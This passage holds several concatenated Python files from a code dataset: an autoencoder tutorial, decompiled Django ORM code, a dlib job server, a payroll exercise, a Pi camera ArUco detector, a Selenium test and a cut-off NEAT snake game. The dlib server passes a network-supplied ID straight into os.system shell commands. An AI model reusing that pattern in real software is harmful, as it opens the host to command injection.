saved\nCHECKPOINT_PATH = \"../saved_models/tutorial9\"\n\ndef get_train_images(num):\n return torch.stack([cifar10_dataset[i][0] for i in range(num)], dim=0)\n\n# Transformations applied on each image => only make them a tensor\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n# Loading the training dataset. We need to split it into a training and validation part\ntrain_dataset = CIFAR10(root=DATASET_PATH, train=True, transform=transform, download=True)\npl.seed_everything(42)\ntrain_set, val_set = torch.utils.data.random_split(train_dataset, [45000, 5000])\n\n# Loading the test set\ntest_set = CIFAR10(root=DATASET_PATH, train=False, transform=transform, download=True)\n\n# We define a set of data loaders that we can use for various purposes later.\ntrain_loader = data.DataLoader(train_set, batch_size=256, shuffle=True, drop_last=True, pin_memory=True, num_workers=4)\nval_loader = data.DataLoader(val_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\ntest_loader = data.DataLoader(test_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\n\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.determinstic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device:\", device)\n\nfor i in range(2):\n # Load example image\n img, _ = train_dataset[i]\n img_mean = img.mean(dim=[1,2], keepdims=True)\n\n # Shift image by one pixel\n SHIFT = 1\n img_shifted = torch.roll(img, shifts=SHIFT, dims=1)\n img_shifted = torch.roll(img_shifted, shifts=SHIFT, dims=2)\n img_shifted[:,:1,:] = img_mean\n img_shifted[:,:,:1] = img_mean\n compare_imgs(img, img_shifted, \"Shifted -\")\n\n # Set half of the image to zero\n img_masked = img.clone()\n img_masked[:,:img_masked.shape[1]//2,:] = img_mean\n compare_imgs(img, img_masked, \"Masked -\")\n\nmodel_dict = {}\nfor latent_dim in [64, 128, 256, 384]:\n model_ld, result_ld = train_cifar(latent_dim)\n model_dict[latent_dim] = {\"model\": model_ld, \"result\": result_ld}\n \ninput_imgs = get_train_images(32)\nfor latent_dim in model_dict:\n visualize_reconstructions(model_dict[latent_dim][\"model\"], input_imgs)\n \nvisualize_reconstructions(model, input_imgs)\n","sub_path":"code/autoencoder_cifar.py","file_name":"autoencoder_cifar.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"648947894","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/db/models/options.py\n# Compiled at: 2018-07-11 18:15:30\nfrom __future__ import unicode_literals\nimport re\nfrom bisect import bisect\nfrom django.conf import settings\nfrom django.db.models.related import RelatedObject\nfrom django.db.models.fields.related import ManyToManyRel\nfrom django.db.models.fields import AutoField, FieldDoesNotExist\nfrom django.db.models.fields.proxy import OrderWrt\nfrom django.db.models.loading import get_models, app_cache_ready\nfrom django.utils import six\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.encoding import force_text, smart_text, python_2_unicode_compatible\nfrom django.utils.translation import activate, deactivate_all, get_language, string_concat\nget_verbose_name = lambda class_name: re.sub(b'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', b' \\\\1', class_name).lower().strip()\nDEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering', 'unique_together',\n 'permissions', 'get_latest_by', 'order_with_respect_to', 'app_label',\n 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable', 'auto_created',\n 'index_together')\n\n@python_2_unicode_compatible\nclass Options(object):\n\n def __init__(self, meta, app_label=None):\n self.local_fields, self.local_many_to_many = [], []\n self.virtual_fields = []\n self.module_name, self.verbose_name = (None, None)\n self.verbose_name_plural = None\n self.db_table = b''\n self.ordering = []\n self.unique_together = []\n self.index_together = []\n self.permissions = []\n self.object_name, self.app_label = None, app_label\n self.get_latest_by = None\n self.order_with_respect_to = None\n self.db_tablespace = settings.DEFAULT_TABLESPACE\n self.admin = None\n self.meta = meta\n self.pk = None\n self.has_auto_field, self.auto_field = False, None\n self.abstract = False\n self.managed = True\n self.proxy = False\n self.proxy_for_model = None\n self.concrete_model = None\n self.swappable = None\n self.parents = SortedDict()\n self.duplicate_targets = {}\n self.auto_created = False\n self.abstract_managers = []\n self.concrete_managers = []\n self.related_fkey_lookups = []\n return\n\n def contribute_to_class(self, cls, name):\n from django.db import connection\n from django.db.backends.util import truncate_name\n cls._meta = self\n self.installed = re.sub(b'\\\\.models$', b'', cls.__module__) in settings.INSTALLED_APPS\n self.object_name = cls.__name__\n self.module_name = self.object_name.lower()\n self.verbose_name = get_verbose_name(self.object_name)\n if self.meta:\n meta_attrs = self.meta.__dict__.copy()\n for name in self.meta.__dict__:\n if name.startswith(b'_'):\n del meta_attrs[name]\n\n for attr_name in DEFAULT_NAMES:\n if attr_name in meta_attrs:\n setattr(self, attr_name, meta_attrs.pop(attr_name))\n elif hasattr(self.meta, attr_name):\n setattr(self, attr_name, getattr(self.meta, attr_name))\n\n ut = meta_attrs.pop(b'unique_together', self.unique_together)\n if ut and not isinstance(ut[0], (tuple, list)):\n ut = (\n ut,)\n self.unique_together = ut\n if self.verbose_name_plural is None:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n if meta_attrs != {}:\n raise TypeError(b\"'class Meta' got invalid attribute(s): %s\" % (b',').join(meta_attrs.keys()))\n else:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n del self.meta\n if not self.db_table:\n self.db_table = b'%s_%s' % (self.app_label, self.module_name)\n self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())\n return\n\n def _prepare(self, model):\n if self.order_with_respect_to:\n self.order_with_respect_to = self.get_field(self.order_with_respect_to)\n self.ordering = ('_order', )\n model.add_to_class(b'_order', OrderWrt())\n else:\n self.order_with_respect_to = None\n if self.pk is None:\n if self.parents:\n field = next(six.itervalues(self.parents))\n already_created = [ fld for fld in self.local_fields if fld.name == field.name ]\n if already_created:\n field = already_created[0]\n field.primary_key = True\n self.setup_pk(field)\n else:\n auto = AutoField(verbose_name=b'ID', primary_key=True, auto_created=True)\n model.add_to_class(b'id', auto)\n collections = {}\n for column, target in six.iteritems(self.duplicate_targets):\n try:\n collections[target].add(column)\n except KeyError:\n collections[target] = set([column])\n\n self.duplicate_targets = {}\n for elt in six.itervalues(collections):\n if len(elt) == 1:\n continue\n for column in elt:\n self.duplicate_targets[column] = elt.difference(set([column]))\n\n return\n\n def add_field(self, field):\n if field.rel and isinstance(field.rel, ManyToManyRel):\n self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)\n if hasattr(self, b'_m2m_cache'):\n del self._m2m_cache\n else:\n self.local_fields.insert(bisect(self.local_fields, field), field)\n self.setup_pk(field)\n if hasattr(self, b'_field_cache'):\n del self._field_cache\n del self._field_name_cache\n if hasattr(self, b'_name_map'):\n del self._name_map\n\n def add_virtual_field(self, field):\n self.virtual_fields.append(field)\n\n def setup_pk(self, field):\n if not self.pk and field.primary_key:\n self.pk = field\n field.serialize = False\n\n def pk_index(self):\n \"\"\"\n Returns the index of the primary key field in the self.fields list.\n \"\"\"\n return self.fields.index(self.pk)\n\n def setup_proxy(self, target):\n \"\"\"\n Does the internal setup so that the current model is a proxy for\n \"target\".\n \"\"\"\n self.pk = target._meta.pk\n self.proxy_for_model = target\n self.db_table = target._meta.db_table\n\n def __repr__(self):\n return b'' % self.object_name\n\n def __str__(self):\n return b'%s.%s' % (smart_text(self.app_label), smart_text(self.module_name))\n\n def verbose_name_raw(self):\n \"\"\"\n There are a few places where the untranslated verbose name is needed\n (so that we get the same value regardless of currently active\n locale).\n \"\"\"\n lang = get_language()\n deactivate_all()\n raw = force_text(self.verbose_name)\n activate(lang)\n return raw\n\n verbose_name_raw = property(verbose_name_raw)\n\n def _swapped(self):\n \"\"\"\n Has this model been swapped out for another? If so, return the model\n name of the replacement; otherwise, return None.\n\n For historical reasons, model name lookups using get_model() are\n case insensitive, so we make sure we are case insensitive here.\n \"\"\"\n if self.swappable:\n model_label = b'%s.%s' % (self.app_label, self.object_name.lower())\n swapped_for = getattr(settings, self.swappable, None)\n if swapped_for:\n try:\n swapped_label, swapped_object = swapped_for.split(b'.')\n except ValueError:\n return swapped_for\n\n if b'%s.%s' % (swapped_label, swapped_object.lower()) not in (None, model_label):\n return swapped_for\n return\n\n swapped = property(_swapped)\n\n def _fields(self):\n \"\"\"\n The getter for self.fields. This returns the list of field objects\n available to this model (including through parent models).\n\n Callers are not permitted to modify this list, since it's a reference\n to this instance (not a copy).\n \"\"\"\n try:\n self._field_name_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_name_cache\n\n fields = property(_fields)\n\n def get_fields_with_model(self):\n \"\"\"\n Returns a sequence of (field, model) pairs for all fields. The \"model\"\n element is None for fields on the current model. Mostly of use when\n constructing queries so that we know which model a field belongs to.\n \"\"\"\n try:\n self._field_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_cache\n\n def _fill_fields_cache(self):\n cache = []\n for parent in self.parents:\n for field, model in parent._meta.get_fields_with_model():\n if model:\n cache.append((field, model))\n else:\n cache.append((field, parent))\n\n cache.extend([ (f, None) for f in self.local_fields ])\n self._field_cache = tuple(cache)\n self._field_name_cache = [ x for x, _ in cache ]\n return\n\n def _many_to_many(self):\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(self._m2m_cache)\n\n many_to_many = property(_many_to_many)\n\n def get_m2m_with_model(self):\n \"\"\"\n The many-to-many version of get_fields_with_model().\n \"\"\"\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(six.iteritems(self._m2m_cache))\n\n def _fill_m2m_cache(self):\n cache = SortedDict()\n for parent in self.parents:\n for field, model in parent._meta.get_m2m_with_model():\n if model:\n cache[field] = model\n else:\n cache[field] = parent\n\n for field in self.local_many_to_many:\n cache[field] = None\n\n self._m2m_cache = cache\n return\n\n def get_field(self, name, many_to_many=True):\n \"\"\"\n Returns the requested field by name. Raises FieldDoesNotExist on error.\n \"\"\"\n to_search = many_to_many and self.fields + self.many_to_many or self.fields\n for f in to_search:\n if f.name == name:\n return f\n\n raise FieldDoesNotExist(b'%s has no field named %r' % (self.object_name, name))\n\n def get_field_by_name(self, name):\n \"\"\"\n Returns the (field_object, model, direct, m2m), where field_object is\n the Field instance for the given name, model is the model containing\n this field (None for local fields), direct is True if the field exists\n on this model, and m2m is True for many-to-many relations. When\n 'direct' is False, 'field_object' is the corresponding RelatedObject\n for this field (since the field doesn't have an instance associated\n with it).\n\n Uses a cache internally, so after the first access, this is very fast.\n \"\"\"\n try:\n try:\n return self._name_map[name]\n except AttributeError:\n cache = self.init_name_map()\n return cache[name]\n\n except KeyError:\n raise FieldDoesNotExist(b'%s has no field named %r' % (\n self.object_name, name))\n\n def get_all_field_names(self):\n \"\"\"\n Returns a list of all field names that are possible for this model\n (including reverse relation names). This is used for pretty printing\n debugging output (a list of choices), so any internal-only field names\n are not included.\n \"\"\"\n try:\n cache = self._name_map\n except AttributeError:\n cache = self.init_name_map()\n\n names = sorted(cache.keys())\n return [ val for val in names if not val.endswith(b'+') ]\n\n def init_name_map(self):\n \"\"\"\n Initialises the field name -> field object mapping.\n \"\"\"\n cache = {}\n for f, model in self.get_all_related_m2m_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, True)\n\n for f, model in self.get_all_related_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, False)\n\n for f, model in self.get_m2m_with_model():\n cache[f.name] = (\n f, model, True, True)\n\n for f, model in self.get_fields_with_model():\n cache[f.name] = (\n f, model, True, False)\n\n if app_cache_ready():\n self._name_map = cache\n return cache\n\n def get_add_permission(self):\n return b'add_%s' % self.object_name.lower()\n\n def get_change_permission(self):\n return b'change_%s' % self.object_name.lower()\n\n def get_delete_permission(self):\n return b'delete_%s' % self.object_name.lower()\n\n def get_all_related_objects(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n return [ k for k, v in self.get_all_related_objects_with_model(local_only=local_only, include_hidden=include_hidden, include_proxy_eq=include_proxy_eq)\n ]\n\n def get_all_related_objects_with_model(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n \"\"\"\n Returns a list of (related-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n self._related_objects_cache\n except AttributeError:\n self._fill_related_objects_cache()\n\n predicates = []\n if local_only:\n predicates.append(lambda k, v: not v)\n if not include_hidden:\n predicates.append(lambda k, v: not k.field.rel.is_hidden())\n cache = self._related_objects_proxy_cache if include_proxy_eq else self._related_objects_cache\n return [ t for t in cache.items() if all(p(*t) for p in predicates) ]\n\n def _fill_related_objects_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_objects_with_model(include_hidden=True):\n if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n proxy_cache = cache.copy()\n for klass in get_models(include_auto_created=True, only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_fields:\n if f.rel and not isinstance(f.rel.to, six.string_types):\n if self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n elif self.concrete_model == f.rel.to._meta.concrete_model:\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n\n self._related_objects_cache = cache\n self._related_objects_proxy_cache = proxy_cache\n return\n\n def get_all_related_many_to_many_objects(self, local_only=False):\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n if local_only:\n return [ k for k, v in cache.items() if not v ]\n return list(cache)\n\n def get_all_related_m2m_objects_with_model(self):\n \"\"\"\n Returns a list of (related-m2m-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n return list(six.iteritems(cache))\n\n def _fill_related_many_to_many_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_m2m_objects_with_model():\n if obj.field.creation_counter < 0 and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n for klass in get_models(only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_many_to_many:\n if f.rel and not isinstance(f.rel.to, six.string_types) and self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n\n if app_cache_ready():\n self._related_many_to_many_cache = cache\n return cache\n\n def get_base_chain(self, model):\n \"\"\"\n Returns a list of parent classes leading to 'model' (order from closet\n to most distant ancestor). This has to handle the case were 'model' is\n a granparent or even more distant relation.\n \"\"\"\n if not self.parents:\n return\n if model in self.parents:\n return [model]\n for parent in self.parents:\n res = parent._meta.get_base_chain(model)\n if res:\n res.insert(0, parent)\n return res\n\n raise TypeError(b'%r is not an ancestor of this model' % model._meta.module_name)\n\n def get_parent_list(self):\n \"\"\"\n Returns a list of all the ancestor of this model as a list. Useful for\n determining if something is an ancestor, regardless of lineage.\n \"\"\"\n result = set()\n for parent in self.parents:\n result.add(parent)\n result.update(parent._meta.get_parent_list())\n\n return result\n\n def get_ancestor_link(self, ancestor):\n \"\"\"\n Returns the field on the current model which points to the given\n \"ancestor\". This is possible an indirect link (a pointer to a parent\n model, which points, eventually, to the ancestor). Used when\n constructing table joins for model inheritance.\n\n Returns None if the model isn't an ancestor of this one.\n \"\"\"\n if ancestor in self.parents:\n return self.parents[ancestor]\n for parent in self.parents:\n parent_link = parent._meta.get_ancestor_link(ancestor)\n if parent_link:\n return self.parents[parent] or parent_link\n\n def get_ordered_objects(self):\n \"\"\"Returns a list of Options objects that are ordered with respect to this object.\"\"\"\n if not hasattr(self, b'_ordered_objects'):\n objects = []\n self._ordered_objects = objects\n return self._ordered_objects","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":19606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"100840928","text":"import os\nimport sys\nimport socket\nfrom config import *\n\nserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserverSock.bind((\"csml-dlib\", apps[\"dlib\"]))\n\ndef main():\n # (simplest) CMD_LINE Format\n # app:container_id:simple_request\n while True:\n\n CMD_LINE, SOURCE_ADDR = serverSock.recvfrom(1024)\n CMD_LINE = CMD_LINE.decode('utf-8')\n container_id = CMD_LINE.split(\":\")[1] # type:str\n simple_request = CMD_LINE.split(\":\")[2] # type:str 'Y' or 'N'\n\n # Ready to process, change the status to [pending]\n # If first use, ignore the error anyway, no harm\n EXE_LINE = \"mv /results/opencv/\" + str(container_id) + \".log /results/dlib/[pending]\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\n if simple_request == 'Y':\n EXE_LINE = \"/dlib-19.18/examples/build/svm_ex\"\n EXE_LINE += \" | ts '[%Y-%m-%d %H:%M:%S]'\"\n EXE_LINE += \" | tee -a /results/dlib/[pending]\" # -a for appending\n EXE_LINE += str(container_id) + \".log\" # One user one .log file\n os.system(EXE_LINE)\n\n # Remove the [pending] status\n EXE_LINE = \"mv /results/dlib/[pending]\" + str(container_id) + \".log /results/dlib/\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/app/dlib_app.py","file_name":"dlib_app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"488705537","text":"# Classes ==================================================================\n \nclass Programmer:\n \n # Add the class attributes\n salary = 30000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, programming_languages):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.programming_languages = programming_languages\n \nclass Assistant:\n \n # Add the class attributes\n salary = 20000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, bilingual):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.bilingual = bilingual\n \n# Program ==================================================================\n \n# Function that prints the monthly salary of each worker\n# and the total amount that the startup owner has to pay per month\ndef calculate_payroll(employees):\n \n total = 0\n \n print(\"\\n========= Welcome to our Payroll System =========\\n\")\n \n # Iterate over the list of instances to calculate\n # and display the monthly salary of each employee,\n # and add the monthly salary to the total for this month\n for employee in employees:\n salary = round(employee.salary / 12, 2) + employee.monthly_bonus\n print(employee.name.capitalize() + \"'s salary is: $\" + str(salary))\n total += salary\n \n # Display the total \n print(\"\\nThe total payroll this month will be: $\", total)\n \n# Instances (employees)\njack = Programmer(\"Jack\", 45, \"5th Avenue\", \"555-563-345\", [\"Python\", \"Java\"])\nisabel = Programmer(\"Isabel\", 25, \"6th Avenue\", \"234-245-853\", [\"JavaScript\"])\nnora = Assistant(\"Nora\", 23, \"7th Avenue\", \"562-577-333\", True)\n \n# List of instances\nemployees = [jack, isabel, nora]\n \n# Function call - Passing the list of instances as argument\ncalculate_payroll(employees)\n","sub_path":"payroll (mini project)/payroll.py","file_name":"payroll.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"426019411","text":"'''\n* Team ID : 117\n* Author List : Ebey Abraham, Akshatha Nayak, Anandhu Udayakumar\n* Filename : picam.py\n* Theme : Antbot\n* Functions : detectAruco(img), markAruco(img,aruco_list), getArucoID(), getArucoBits()\n* Global Variables : NONE\n'''\nfrom imutils.video.videostream import VideoStream\nimport imutils\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport time\nimport csv\nimport pandas as pd\nimport numpy as np\n\nclass Camera:\n def __init__(self):\n self.IDs = []\n #range for red color\n self.lower_red = np.array([160,100,0])\n self.upper_red = np.array([180,255,255])\n #range for blue color\n self.lower_blue = np.array([100,100,0])\n self.upper_blue = np.array([140,255,255])\n #range for green color\n self.lower_green = np.array([40,100,0])\n self.upper_green = np.array([80,255,255])\n #range for yellow color\n self.lower_yellow = np.array([10,100,100])\n self.upper_yellow = np.array([30,255,255])\n\n '''\n * Function Name : detectAruco\n * Input : img-> image to detect aruco marker from\n * Output : returns the detected aruco id and its corner as a dictionary\n * Logic : check that the image frame has only one aruco marker and return the id and corner list as a key value pair\n * Example Call : detectAruco(img)\n '''\n def detectAruco(self,img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #create aruco dictionary of 7x7 bits and 1000 combinations\n aruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_1000)\n parameters = aruco.DetectorParameters_create()\n #list of corners and ids\n corners, ids, _ = aruco.detectMarkers(gray,aruco_dict,parameters = parameters)\n aruco_list = {} #stores pairs of aruco id and corresponding corners\n #check that only one aruco marker is there and return the aruco id\n if len(corners) == 1:\n aruco_list[ids[0][0]] = corners[0][0]\n return aruco_list\n\n '''\n * Function Name : markAruco\n * Input : img-> image to detect aruco marker from\n aruco_list -> dictionary of aruco corners indexed by the aruco ID\n * Output : returns the image with the marked corners\n * Logic : find the center of the aruco marker by finding the mean and mark the center and the corners\n * Example Call : markAruco(img,aruco_list)\n '''\n def markAruco(self,img,aruco_list):\n ids = aruco_list.keys()\n font = cv2.FONT_HERSHEY_SIMPLEX\n for id in ids:\n corners = aruco_list[id]\n center = corners[0] + corners[1] + corners[2] + corners[3]\n center[:] = [int(x/4) for x in center]\n center = tuple(center)\n #marking the points\n cv2.circle(img,center,1,(0,0,255),8)\n cv2.circle(img,tuple(corners[0]),1,(0,0,255),8)\n cv2.circle(img,tuple(corners[1]),1,(0,255,0),8)\n cv2.circle(img,tuple(corners[2]),1,(255,0,0),8)\n return img\n\n '''\n * Function Name : getArucoID\n * Input : NONE\n * Output : returns the detected aruco ID\n * Logic : loop the camera feed till a aruco marker id detected by detectAruco\n * Example Call : getArucoID()\n '''\n def getArucoID(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n ids = []\n while len(ids) < 4:\n ID = 0 #stores the detected ID\n frame = vs.read()\n aruco_list = self.detectAruco(frame)\n if len(aruco_list):\n foundID = True\n ID = list(aruco_list.keys())\n ID = ID[0]\n #check that the detected ID is not repeated and add to the list of ids\n if ID > 0 and ID not in ids:\n ids.append(ID)\n #self.IDs.append(bin(ID)[2:]) #store ID in binary format\n print(\"ID Detected: {}\".format(ID))\n vs.stop()\n\n def getColor(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n count = 3\n colors = {'r':0,'b':0,'g':0,'y':0}\n while count:\n count -= 1\n frame = vs.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n mask_red = cv2.inRange(hsv,self.lower_red,self.upper_red)\n mask_blue = cv2.inRange(hsv,self.lower_blue,self.upper_blue)\n mask_green = cv2.inRange(hsv,self.lower_green,self.upper_green)\n mask_yellow = cv2.inRange(hsv,self.lower_yellow,self.upper_yellow)\n\n colors['r'] = cv2.countNonZero(mask_red)\n colors['b'] = cv2.countNonZero(mask_blue)\n colors['g'] = cv2.countNonZero(mask_green)\n colors['y'] = cv2.countNonZero(mask_yellow)\n\n #res = cv2.bitwise_and(frame,frame,mask = mask_yellow)\n #cv2.imshow(\"Res\",res)\n #cv2.waitKey(10)\n vs.stop()\n print(colors)\n for color in colors:\n if colors[color] > 5000:\n return color\n return 'x'\n\n\nif __name__ == \"__main__\":\n cam = Camera()\n res = cam.getColor()\n print(res)\n","sub_path":"utils/picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"181941212","text":"import time\n\nfrom django.test import TestCase, override_settings\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .utils import element_has_css_class\n\nimport os\nos.environ['WDM_LOG_LEVEL'] = '0'\n\nclass TestBatonIndex(TestCase):\n def setUp(self):\n service = Service(ChromeDriverManager(version='114.0.5735.90').install())\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-dev-shm-usage')\n self.driver = webdriver.Chrome(\n service=service,\n options=chrome_options,\n )\n self.driver.set_window_size(1920, 1080)\n self.driver.implicitly_wait(10)\n self.login()\n\n def tearDown(self):\n self.driver.quit()\n\n def login(self):\n self.driver.get('http://localhost:8000/admin')\n username_field = self.driver.find_element(By.ID, \"id_username\")\n password_field = self.driver.find_element(By.ID, \"id_password\")\n button = self.driver.find_element(By.CSS_SELECTOR, 'input[type=submit]')\n\n username_field.send_keys('admin')\n time.sleep(1)\n password_field.send_keys('admin')\n time.sleep(1)\n button.click()\n\n def test_force_theme(self):\n # Wait until baton is ready\n wait = WebDriverWait(self.driver, 10)\n wait.until(element_has_css_class((By.TAG_NAME, 'body'), \"baton-ready\"))\n\n # site title\n html = self.driver.find_element(By.CSS_SELECTOR, \"html\")\n self.assertEqual(\n html.get_attribute('data-bs-theme'), 'light')\n","sub_path":"testapp/app/app/tests/test_e2e_theme.py","file_name":"test_e2e_theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"474173512","text":"import pygame\nimport time\nimport random\nimport neat\nimport os\nimport math\n \npygame.init()\n \nwhite = (255, 255, 255)\nyellow = (255, 255, 102)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n \ndis_width = 230\ndis_height = 230\n \nbestscore1 = 0\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by Taren P')\n \nclock = pygame.time.Clock()\n \nsnake_block = 10\nsnake_speed = 150\n \napple = pygame.image.load(os.path.join(\"Graphics\", \"apple.png\"))\napple = pygame.transform.scale(apple, (20, 20))\nfont_style = pygame.font.SysFont(\"bahnschrift\", 15)\nscore_font = pygame.font.SysFont(\"comicsansms\", 20)\n \ndef remove(index):\n snakes.pop(index)\n ge.pop(index)\n nets.pop(index)\n\ndef Your_score(score, y):\n global bestscore1\n text_1 = font_style.render(f'Snakes Alive: {str(len(snakes))}', True, white)\n dis.blit(text_1, [100, 210])\n value = score_font.render(\"Your Score: \" + str(score), True, yellow)\n dis.blit(value, [0, 0])\n if bestscore1 < score:\n bestscore1 = score\n value3 = font_style.render(f'Generation: {pop.generation+1}', True, white)\n dis.blit(value3, [0, 190])\n value2 = font_style.render(\"Best Score: \" + str(bestscore1), True, white)\n dis.blit(value2, [0, 210])\n\ndef find(lst, r):\n return [i for i, x in enumerate(lst) if x == r]\n \n \ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, green, [x[0], x[1], snake_block, snake_block])\n \ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\nscore = 0\ndef gameLoop(genomes, config, i, y):\n game_over = False\n game_close = False\n global score\n x1 = (dis_width / 2) + 5\n y1 = (dis_height / 2) + 5\n \n x1_change = 0\n y1_change = 0\n location = []\n amount = []\n counter = 0\n\n snake_List = []\n Length_of_snake = 3\n score = 0\n #x1_change = -snake_block\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n ge[i].fitness -= 10\n game_close = True\n x1 += x1_change\n y1 += y1_change\n dis.fill(blue)\n l = 0\n if foody == (dis_width/2) + 5:\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n if foodx == (dis_height/2) + 5:\n foodx = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n while l <= dis_width/10:\n pygame.draw.line(dis, black, (0, (dis_height / 23)*l), (dis_width, (dis_height / 23)*l))\n pygame.draw.line(dis, black, ((dis_width / 23)*l, 0), ((dis_width / 23)*l, dis_height))\n l+=1\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n dis.blit(apple, (foodx-5, foody -5.7))\n snake_Head = []\n snake_Head.append(x1)\n snake_Head.append(y1)\n snake_List.append(snake_Head)\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n \n for x in snake_List[:-1]:\n if x == snake_Head:\n ge[i].fitness -= 10\n game_close = True\n output = nets[i].activate((distance((x1, y1), (foodx, foody)), Length_of_snake, x1, y1, dis_width, foodx, foody))\n if output[0] > 0.5:\n x1_change = -snake_block\n y1_change = 0\n if output[1] > 0.5:\n x1_change = snake_block\n y1_change = 0\n if output[2] > 0.5:\n y1_change = -snake_block\n x1_change = 0\n if output[3] > 0.5:\n y1_change = snake_block\n x1_change = 0\n location.append(distance((x1, y1), (foodx, foody)))\n if len(location) > 100:\n del location[0]\n for r in location:\n amount = find(location, r)\n if 